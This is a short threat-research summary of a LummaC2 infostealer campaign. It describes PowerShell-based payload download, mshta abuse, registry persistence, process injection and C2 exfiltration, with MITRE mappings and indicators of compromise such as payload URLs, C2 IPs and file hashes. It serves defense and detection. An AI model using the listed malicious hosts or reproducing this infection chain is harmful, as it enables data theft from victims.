Threat Research

Obfuscated PowerShell Uncovers Lumma C2 Stealer

Securonix

Recent LummaC2 samples reveal a multi-stage infostealer chain that starts with PowerShell commands to download and decrypt payloads, then communicates with C2 servers to exfiltrate data. The campaign leverages LOLbins like mshta.exe, registry persistence, and process injection into dllhost.exe to maintain control. #LummaC2 #LummaInfostealer

Keypoints

  • Recent uptick in LummaC2 infostealer activity.
  • Lumma is a C-based information-stealing malware used as Malware-as-a-Service (MaaS) on forums since 2022.
  • Initial infection occurs via PowerShell commands that download and execute the malware.
  • Samples exhibit high entropy, suggesting obfuscation techniques.
  • Malware uses legitimate Windows binaries (e.g., mshta.exe) as LOLbins.
  • Persistence and C2 operations involve registry modifications, process injection, and creation of child processes (e.g., dllhost.exe).
  • Indicators of compromise include specific URLs and IP addresses associated with the malware.

MITRE Techniques

  • [T1036] Masquerading – Malware attempts to disguise itself to avoid detection. “Masquerading” –
  • [T1059.001] PowerShell – Initial execution through PowerShell commands. “Initial execution through PowerShell commands.”
  • [T1218.005] Living off the Land Binaries – Uses mshta.exe to execute malicious scripts. “Mshta.exe is an executable file designed to execute Microsoft HTML files, known as ‘HTA’. As a legitimate Microsoft Windows binary, it is considered a LOLbin (Living off the Land binary), which allows actors to use the process for malicious purposes.”
  • [T1547.001] Registry Run Keys / Startup Folder – Modifies registry to achieve persistence. “This is one of the most common spots for persistence, as it allows the actor to obtain access to the target endpoint.”
  • [T1055] Process Injection – Injects code into legitimate processes (e.g., dllhost.exe) for malicious actions. “Malicious code is injected into ‘Bitlockertogo.exe,’ which then creates two additional processes that finally create ‘dllhost.exe.’”
  • [T1119] Collection – Collects data from the target system. “Collects data from the target system.”
  • [T1041] Exfiltration Over Command and Control Channel – Exfiltrates data through established command and control channels. “Exfiltrates data through established command and control channels.”

Indicators of Compromise

  • [URL] Endpoints used for payload delivery and C2 – https://mato-camp-v4.b-cdn.net, http://campzips1.b-cdn.net/U1.zip
  • [IP Address] Command and control endpoints – 188.68.220.48, 185.166.143.48
  • [Domain] Domains involved in C2/hosting – vamplersam.info, bitbucket.org
  • [File Name/Hash] Dropped payloads and components – ashampoo.exe – SHA256: 2caf283566656a13bf71f8ceac3c81f58a049c92a788368323b1ba25d872372e, Kesty[1] – SHA256: 2468e5bb596fa4543dba2adfe8fd795073486193b77108319e073b9924709a8a; and 2 more hashes

Read more: https://www.ontinue.com/resource/obfuscated-powershell-leads-to-lumma-c2-stealer/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint